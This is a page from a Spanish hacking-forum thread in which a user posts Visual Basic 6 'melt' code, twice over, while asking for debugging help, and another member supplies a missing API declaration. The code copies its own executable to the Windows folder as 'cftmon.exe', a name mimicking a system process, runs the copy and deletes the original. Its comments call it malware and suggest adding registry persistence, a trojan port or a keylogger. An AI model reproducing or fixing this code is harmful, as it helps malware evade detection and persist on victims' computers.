elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [Source] How to Melt a file in VB6
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: [Source] How to Melt a file in VB6  (Leído 11,309 veces)
hepy_92

Desconectado Desconectado

Mensajes: 130



Ver Perfil
Re: [Source] How to Melt a file in VB6
« Respuesta #10 en: 18 Mayo 2007, 23:21 pm »

Gracias!!!


En línea

hepy_92

Desconectado Desconectado

Mensajes: 130



Ver Perfil
Re: [Source] How to Melt a file in VB6
« Respuesta #11 en: 18 Mayo 2007, 23:26 pm »

hm.. aora que me doi cuenta, me da error el melt! :-(
esto puse en code

 
Código:
private sub form_load()
call main
end sub' puse esto ademas de mi code, que no publico porque quedaria mui largo

Sub Main()
    'Obtenemos el nombre de nuestro ejecutable
    MyName = App.EXEName
   
    'Comprobamos si nos llamamos CTFMON
    If LCase(App.EXEName) = "cftmon" Then
        Call Execute
    Else
        Call MeltFile
    End If
End Sub

Function Execute()
    'Función que se encarga de borrar el archivo original a partir
    'de su ruta. Al terminar ejecuta el PayLoad
   
    On Error Resume Next

    If Not IsEmpty(Command$) Then   'Verificamos si tenemos algo en los argumentos
        While Dir(Command$) <> ""   'Comprobamos si existe el archivo que tenemos en los argumentos
            Kill Command$           '   Si existe... lo borramos
            DoEvents                '   Esperamos un poco
        Wend                        'Bucle
    End If
    Call PayLoad                    'Ejecutamos el resto del Malware
End Function

Function MeltFile()
    'Función que copia el propio Malware en la carpeta TEMP del sistema
    'con el nombre de cftmon.exe. Ejecuta luego el archivo enviando como
    'argumento su propia ruta.
   
    Dim MySelf As String
    MySelf = String$(255, Chr$(0))

    GetModuleFileName 0, MySelf, Len(MySelf)        'Devuele la ruta correcta de tu aplicación

    FileCopy MySelf, Environ("windir") & "\cftmon.exe" 'Nos copiamos en "TEMP\cftmon.exe"
    DoEvents                                        'Esperamos...
    Shell Environ("windir") & "\cftmon.exe " & MySelf  'Ejecutamos "TMP\cftmon.exe" + Ruta de tu aplicación
    End                                             'Finalizamos (importante! xD)
End Function

Function PayLoad()
    'Aqui incluimos el resto de código de tu Malware...
    'Recomiendo llamar ahora a la función de AddToRegedit() para añadir la
    'aplicación con el Melt (cftmon.exe) al registro, abrir el puerto del troyano
    'activar el keylogger o lo que quieras programar :P
   
    MsgBox "Si estas leyendo esto es que tu aplicación ha hecho MELT y se ha borrado el archivo original, :P", vbInformation, "Melt in VB6"
    End
End Function


hay algo que ise mal?


En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Source] How to Melt a file in VB6
« Respuesta #12 en: 19 Mayo 2007, 00:13 am »

Te falta la declaración de la API, no?

Código:
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
hepy_92

Desconectado Desconectado

Mensajes: 130



Ver Perfil
Re: [Source] How to Melt a file in VB6
« Respuesta #13 en: 19 Mayo 2007, 01:40 am »

si la tengo...
pero al principio me salia que MyName, no estaba declarado... asique lo declare como string.. o esta mal??=S
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Source] How to Melt a file in VB6
« Respuesta #14 en: 19 Mayo 2007, 01:45 am »

Mira si tienes esta línea en tu proyecto y borrala:

Código:
Option Explicit

Si no, dinos en qe linea te peta y que error te devuelve!
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
hepy_92

Desconectado Desconectado

Mensajes: 130



Ver Perfil
Re: [Source] How to Melt a file in VB6
« Respuesta #15 en: 19 Mayo 2007, 01:50 am »

no esta...
se me avia olvidado ponerlo en un modulo, aora lo ise i me apunta a:

 
Código:
GetModuleFileName
i me dise procedimiento sub o function no definido..
En línea

hepy_92

Desconectado Desconectado

Mensajes: 130



Ver Perfil
Re: [Source] How to Melt a file in VB6
« Respuesta #16 en: 19 Mayo 2007, 18:28 pm »

me di cuenta de mi error.. me falto una linea ¬¬
pero ahora me sale otro =S
si lo ejecuto sale este error:
  Error '91' en tiempo de ejecución:
  La variable de tipo Object o la variable de bloque With no está establecida
alguien me puede decir que estoy asiendo mal porfavor!?
 les adjunto el code para que vean lo que hice
 
Código:
Dentro del Form1, (form principal)
call Main 'para llamar a la funcion
'i el resto de mi code, que no pongo, para que no se alarge tanto

Dentro de Module1
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long

Sub Main()
    'Obtenemos el nombre de nuestro ejecutable
    MyName = App.EXEName
   
    'Comprobamos si nos llamamos CTFMON
    If LCase(App.EXEName) = "cftmon" Then
        Call Execute
    Else
        Call MeltFile
    End If
End Sub

Function Execute()
    'Función que se encarga de borrar el archivo original a partir
    'de su ruta. Al terminar ejecuta el PayLoad
   
    On Error Resume Next

    If Not IsEmpty(Command$) Then   'Verificamos si tenemos algo en los argumentos
        While Dir(Command$) <> ""   'Comprobamos si existe el archivo que tenemos en los argumentos
            Kill Command$           '   Si existe... lo borramos
            DoEvents                '   Esperamos un poco
        Wend                        'Bucle
    End If
    Call PayLoad                    'Ejecutamos el resto del Malware
End Function

Function MeltFile()
    'Función que copia el propio Malware en la carpeta TEMP del sistema
    'con el nombre de cftmon.exe. Ejecuta luego el archivo enviando como
    'argumento su propia ruta.
        Dim MySelf As String
    MySelf = String$(255, Chr$(0))

    GetModuleFileName 0, MySelf, Len(MySelf)        'Devuele la ruta correcta de tu aplicación

    FileCopy MySelf, Environ("windir") & "\cftmon.exe" copia  a windows en ves de Temp
    DoEvents                                        'Esperamos...
    Shell Environ("windir") & "\cftmon.exe " & MySelf  'Ejecutamos "windows\cftmon.exe" + Ruta de tu aplicación
    End                                             'Finalizamos (importante! xD)
End Function

Function PayLoad()
    'Aqui incluimos el resto de código de tu Malware...
    'Recomiendo llamar ahora a la función de AddToRegedit() para añadir la
    'aplicación con el Melt (cftmon.exe) al registro, abrir el puerto del troyano
    'activar el keylogger o lo que quieras programar :P
   
    MsgBox "Si estas leyendo esto es que tu aplicación ha hecho MELT y se ha borrado el archivo original, :P", vbInformation, "Melt in VB6"
    End
End Function

no es problema de Shell Environ("windir"), lo he revisado y esta bien.. me sale lo mismo si pongo tmp
« Última modificación: 19 Mayo 2007, 18:48 pm por hepy_92 » En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[FUNCION] Autoit MELT
Scripting
79137913 0 2,061 Último mensaje 10 Diciembre 2013, 14:57 pm
por 79137913
[VBS]Perfect Melt
Scripting
xXSCORPIOXx 7 4,012 Último mensaje 21 Marzo 2014, 01:58 am
por 79137913
[SOURCE] File 2 startup v1.2
.NET (C#, VB.NET, ASP)
Eleкtro 0 2,566 Último mensaje 15 Enero 2015, 01:59 am
por Eleкtro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines